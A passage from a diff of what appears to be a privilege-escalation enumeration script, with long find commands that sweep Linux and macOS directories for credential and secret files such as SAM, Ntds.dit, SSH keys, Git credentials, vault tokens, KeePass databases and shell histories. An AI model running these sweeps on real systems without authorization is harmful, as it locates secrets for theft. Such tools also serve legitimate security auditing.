\"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"ssh*config\" -o -name \"config.php\" -o -name \"*.kdbx\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name \"unattend.txt\" -o -name \"php.ini\" -o -name \".gitconfig\" -o -name \"autologin\" -o -name \"ws_ftp.ini\" -o -name \"recentservers.xml\" -o -name \"*.socket\" -o -name \"scclient.exe\" -o -name \"TokenCache.dat\" -o -name \"storage.php\" -o -name \"*credential*\" -o -name \"AppEvent.Evt\" -o -name \".msmtprc\" -o -name \"iis6.log\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"software\" -o -name \"unattend.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"rsyncd.secrets\" -o -name \"RDCMan.settings\" -o -name \"sess_*\" -o -name \"software.sav\" -o -name \"kadm5.acl\" -o -name \"credentials\" -o -name \"wcx_ftp.ini\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.pem\" -o -name \"sysprep.xml\" -o -name \".bashrc\" -o -name \"*.key\" -o -name \"*.ovpn\" -o -name \"authorized_keys\" -o -name \"sites.ini\" -o -name \"docker.socket\" -o -name \"bash.exe\" -o -name \"NetSetup.log\" -o -name \"cloud.cfg\" -o -name \"mosquitto.conf\" -o -name \"KeePass.ini\" -o -name \"ftp.ini\" -o -name \".plan\" -o -name \"wsl.exe\" -o -name \"accessTokens.json\" -o -name \"appcmd.exe\" -o -name \"ftp.config\" -o -name \"printers.xml\" -o -name \"pgsql.conf\" -o -name \"autologin.conf\" -o -name \".htpasswd\" -o -name \"*.viminfo\" -o -name \"settings.php\" -o -name \"database.php\" -o -name \"my.ini\" -o -name \"SecEvent.Evt\" -o -name \"sysprep.inf\" -o -name \".k5login\" -o -name \"*.ftpconfig\" -o -name \"pg_hba.conf\" -o -name \"krb5.keytab\" -o -name \"AzureRMContext.json\" -o -name \"https-xampp.conf\" -o -name \"hosts.equiv\" -o -name \"server.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"services.xml\" -o -name \"*.service\" -o -name \"azureProfile.json\" -o -name \".git-credentials\" -o -name \"*config*.php\" -o -name \"*.p12\" -o -name \".recently-used.xbel\" -o -name \".erlang.cookie\" -o -name \"authorized_hosts\" -o -name \"pgadmin*.db\" -o -name \"error.log\" -o -name \"ntuser.dat\" -o -name \"cesi.conf\" -o -name \"gitlab.yml\" -o -name \"supervisord.conf\" -o -name \"*.der\" -o -name \"redis.conf\" -o -name \"access.log\" -o -name \"snmpd.conf\" -o -name \"backup\" -o -name \"ddclient.conf\" -o -name \"docker-compose.yml\" -o -name \"scheduledtasks.xml\" -o -name \"winscp.ini\" -o -name \"*.pfx\" -o -name \"kibana.y*ml\" -o -name \"hostapd.conf\" -o -name \".google_authenticator\" -o -name \"index.dat\" -o -name \"creds*\" -o -name \"*password*\" -o -name \".env\" -o -name \".profile\" -o -name \".vault-token\" -o -name \".ldaprc\" -o -name \"groups.xml\" -o -name \"legacy_credentials.db\" -o -name \"*.crt\" -o -name \"drives.xml\" -o -name \"httpd.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o -name \"*.csr\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \"*.keyring\" -o -name \"ipsec.conf\" -o -name \"ffftp.ini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - #MacOS Directories - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /Applications -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - # All - FIND_HOME=`eval_bckgrd "find $HOMESEARCH $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run/ $FIND_DOCKER_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system/ $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - - #MacOS - FIND_PRIVATE=`eval_bckgrd "find /private/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -O $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o 